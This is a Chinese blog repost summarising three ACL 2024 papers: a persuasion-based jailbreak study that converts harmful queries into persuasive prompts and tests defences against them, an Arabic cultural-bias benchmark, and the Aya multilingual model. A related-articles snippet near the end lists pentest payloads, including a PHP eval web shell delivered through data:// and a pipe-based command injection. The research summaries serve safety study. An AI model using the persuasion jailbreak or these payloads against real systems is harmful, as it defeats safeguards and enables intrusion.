关注gongzhonghao【计算机sci论文精选

近年来,以Transformer架构为核心的大语言模型重塑了自然语言处理领域的技术范式。当前ACL相关研究呈现多维度深化态势,从开源社区推动轻量化架构与低成本训练技术革新,到学术界探索检索增强等机制突破长尾知识覆盖局限,再到医疗、海洋等垂直领域专用模型开发成为新热点。

今天小图给大家精选3篇ACL有关大模型方向的论文,请注意查收!

How Johnny Can Persuade LLMs to Jailbreak Them: Rethinking Persuasion to Challenge AI Safety by Humanizing LLMs

方法:

文章首先构建了一个包含40种说服技巧的分类体系,涵盖信息、情感、权威等多个维度,为生成PAP提供了理论基础。接着,通过微调预训练语言模型,构建了一个能够将普通有害查询转化为PAP的“说服性释义器”,并利用这一工具在14个风险类别上进行了广泛的扫描实验。最后,文章通过迭代优化PAP生成过程,进一步提高了攻击成功率,并对现有防御机制进行了深入分析,提出了新的防御策略。

图片

创新点:

  • 提出了一个基于社会科学研究的说服技巧分类体系,首次系统地将人类说服技巧应用于AI安全研究,为后续研究提供了新的工具。

  • 自动生成了具有高攻击成功率的说服性对抗性提示,在多种大型语言模型上验证了其有效性,证明了日常语言交互中的说服行为对AI安全构成的威胁。

  • 发现现有防御机制在应对PAP时存在显著缺陷,并提出了针对PAP的适应性防御策略,为AI安全防御提供了新的方向。

图片

论文链接:

https://arxiv.org/abs/2401.06373

图灵学术论文辅导

论文二:Having Beer after Prayer? Measuring Cultural Bias in Large Language Models

方法:

文章首先从Wikidata和CommonCrawl中提取具有文化差异的实体,并从Twitter/X中获取自然语言提示,构建了CAMeL资源库。接着,利用CAMeL对多种语言模型在故事生成、命名实体识别、情感分析和文本填充等任务上进行跨文化性能测试。最后,分析了阿拉伯语预训练语料库的文化相关性,发现西方内容的高比例可能是导致语言模型文化偏见的关键因素。

图片

创新点:

  • 构建了CAMeL资源库,为评估语言模型的文化偏见提供了基础。

  • 通过CAMeL,首次系统地评估了16种不同语言模型在阿拉伯语环境下的跨文化表现,揭示了令人担忧的文化刻板印象和不公平现象。

  • 分析了6个阿拉伯语预训练语料库,为改进语言模型的文化适应性提供了数据支持。

图片

论文链接:

https://aclanthology.org/2024.acl-long.862/

图灵学术论文辅导

论文三:Aya Model: An Instruction Finetuned Open-Access Multilingual Language Model

方法:

文章首先基于mT5预训练模型,通过整合xP3x、Aya集合、Aya数据集、数据溯源集合以及翻译合成数据等多源数据,构建了包含203M数据点的训练语料库。接着,通过调整不同数据源的权重,进行了多种采样策略的实验,以优化模型在不同任务和语言上的表现。最后,通过多语言评估体系和安全上下文蒸馏技术,对模型的性能和安全性进行了全面测试和优化。

图片

创新点:

  • Aya模型将语言覆盖范围扩展到101种语言,其中超过半数为资源较少的语言,显著扩大了多语言指令微调模型的适用范围。

  • 引入了广泛的多语言评估体系,涵盖99种语言和多种任务类型,包括区分性任务、生成性任务以及人类和LLM评估,全面衡量模型性能。

  • 实施了多语言安全上下文蒸馏技术,有效降低了模型在对抗性提示下的有害输出比例,提升了多语言环境下的安全性。

图片

论文链接:

https://aclanthology.org/2024.acl-long.845/

本文选自gongzhonghao【计算机sci论文精选

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/bicheng/91668.shtml
繁体地址,请注明出处:http://hk.pswp.cn/bicheng/91668.shtml
英文地址,请注明出处:http://en.pswp.cn/bicheng/91668.shtml

如若内容造成侵权/违法违规/事实不符,请联系英文站点网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

乐创E20H1型IO从站与Ethercat转Profinet网关转换器的配置应用案例

本案例聚焦于西门子 1200PLC 与 E20H1 - T01 IO 从站的连接。在正常运行过程中,E20H1 - T01 IO 从站需支持 EtherCAT 协议,作为 EtherCAT 从站;而监控系统所采用的西门子 S7 - 1200 系列 PLC 则支持 PROFINET 协议。由于协议的不一致性&#…

【2】专业自定义图表创建及应用方法

一、专业自定义图表创建及应用方法1)不是图表的图表制作方法例题1:迷你图表制作方法定义:指依靠Excel基本制图功能之外的其他功能(如公式、条件格式、迷你图等)创建的数据可视化图表特点:引用数据少且占用…

embodied复现所需docker环境配置粗略流程

由于embodied很多安装包都需要linux环境,所以为了建立虚拟ubuntu系统,在不适用vmvare的情况,可以考虑使用docker容器来实现,也不会出现的vmware的卡顿情况 1.首先建立容器,并和pycharm建立连接,先安装docker desktop&a…

2025.8-12月 AI相关国内会议

以下是2025年8月至12月国内与人工智能(AI)相关的重要会议及活动总结,按时间顺序排列: 2025年8月第六届人工智能与机电自动化国际学术会议(AIEA 2025) • 时间:8月1-3日 • 地点:安徽…

计数组合学7.10(舒尔函数的组合定义)

7.10 舒尔函数的组合定义 前几节讨论的四个基 mλm_{\lambda}mλ​、eλe_{\lambda}eλ​、hλh_{\lambda}hλ​ 和 pλp_{\lambda}pλ​ 的定义都较为直观。本节将介绍第五个基,其元素记为 sλs_{\lambda}sλ​,称为舒尔函数,其定义则更为微…

【前端】CSS Grid布局介绍及示例

CSS Grid 简介 CSS Grid 是一个二维布局系统,专为处理行和列的复杂网页布局而设计。与 Flexbox(一维布局)不同,Grid 允许开发者同时控制行和列,实现更精确的布局结构。 核心概念: Grid 容器:通过…

[echarts]多个柱状图及图例

前言 实现多个柱状图功能,并设置多个图例样式,并定时刷新数据 react引入echarts import React, { useEffect, useRef } from react; import * as echarts from echarts; import DeviceApi from /api/screen/DeviceApi;const CenterDeviceSummary (props…

【读文献】Capacitor-drop AC-DC

[1] F. Song, et al., “An 85-to-230VAC to 3.3-to-4.6VDc 1.52W Capacitor-Drop Sigma-Floating-SC AC-DC Converter with 81.3% Peak Efficiency,” 2025 IEEE International Solid-State Circuits Conference (ISSCC), 2025.以下是针对该电容降压AC-DC转换器设计的通俗版解…

`StreamConfigurationMap` 实现逻辑与解析过程详解:相机流能力的声明、匹配与验证机制全景

StreamConfigurationMap 实现逻辑与解析过程详解:相机流能力的声明、匹配与验证机制全景 关键词: StreamConfigurationMap、CameraCharacteristics、OutputFormat、InputFormat、Size 配置、帧率范围、流兼容性、配置失败调试 摘要: StreamConfigurationMap 是 Android 相…

关于“PromptPilot” 之3 -Prompt构造器核心专项能力:任务调度

本篇问题Q20. 以上设计是“原始制造商”的典型范式。在三个不同理论层级(Prompt 构造进程的三个子进程(线程))分别适合三种不同的取向: 面向目标、面向结果和面向过程。不同取向将采取不同的策略 和不同的 监控方式&am…

Solana: 链上开发入门,用 Anchor 和 Rust 构建第一个程序

大家好,如果大家对 Solana 开发充满好奇,但又对 Rust 语言感到陌生,那么大家来对地方了。很多人在探索 Solana 这条高性能公链时,遇到的第一个门槛就是其原生开发语言——Rust。Rust 以其高性能和内存安全著称,但学习曲…

node.js之Koa框架

Koa框架介绍Koa 是一个新的 web 框架,由 Express 原班人马打造,致力于成为一个更小、更富有表现力、更健壮的 Web 框架。Koa 解决了 Express 存在的一些问题,例如:中间件嵌套回调(callback hell)错误处理不…

C/C++离线环境安装(VSCode + MinGW)

因为工作需要部署离线C环境,网上有许多大佬分享了不错的教程,总结一篇完整教程自用,使用VSCode MinGW感谢一、安装准备二、软件安装1.安装MinGW2.安装VSCode及插件三、测试环境1.创建工程文件夹2.创建cpp文件总结感谢 本教程参考了以下教程…

如何创建一个飞书应用获取自己的飞书AppID和AppSecret?

这篇文章是接下来要开发「监控 X(原Twitter)博主账号最新推文」 自动化工作流的先导文章,由于内容相对独立,也可用于飞书应用的其他场景,故单独发出来,方便查阅。 监控X平台指定博主最新发文,需…

Prompt工程记录

Prompt基本建议:1.在查询中包含详细信息以获得更相关的答案总结会议笔记:先将会议笔记总结为一段,然后写一份演讲者的打分表,列出他们的每个要点;最后列出发言者建议的下一步行动或者行动项目(如果有的话)2…

CTE公用表表达式的可读性与性能优化

一、可读性优化CTE通过WITH子句定义临时命名结果集,将复杂查询分解为逻辑独立的模块,显著提升代码清晰度与可维护性‌:‌解构嵌套查询‌:将多层嵌套的子查询扁平化,例如传统嵌套统计订单的查询可重构为分步CTE&#xf…

8.1.2 TiDB存储引擎的原理

TiDB 简介 TiDB 是 PingCAP 公司自主设计、研发的开源分布式关系型数据 库,是一款同时支持在线事务处理与在线分析处理 (Hybrid Transactional and Analytical Processing, HTAP) 的融合型分布 式数据库产品,具备水平扩容或者缩容、金融级高可用、实时 …

PTE之路--01

空格绕过:/**/ URL编码伪协议:pagezip://xxx/xx/x/x/xxx.jpg%23解压后的名字pagephar://xxx/xx/x/x/xxx.jpg/解压后的名字pageddata://ata://text/plain,<?php eval($_POST[x]) ;?>pagedata://text/plain,<?php eval($_POST[x]) ;?>127.0.0.1 | grep . ../key…

企业级日志分析系统ELK

1.什么是 Elastic Stack 如果系统和应用出现异常和问题,相关的开发和运维人员想要排查原因,就要先登录到应用运行所相应的主机,找到上面的相关日志文件再进行查找和分析,所以非常不方便,此外还会涉及到权限和安全问题,而ELK 的出现就很好的解决这一问题。 ELK 是由一家 …

ai项目多智能体

手把手教你构建一个 本地化的&#xff0c;免费的&#xff0c;企业级的&#xff0c;AI大模型知识库问答系统 - 网旭哈瑞.AI 体验 AutoGen Studio - 微软推出的友好多智能体协作框架_autogenstudio-CSDN博客 AutoGen Studio: Interactively Explore Multi-Agent Workflows | Au…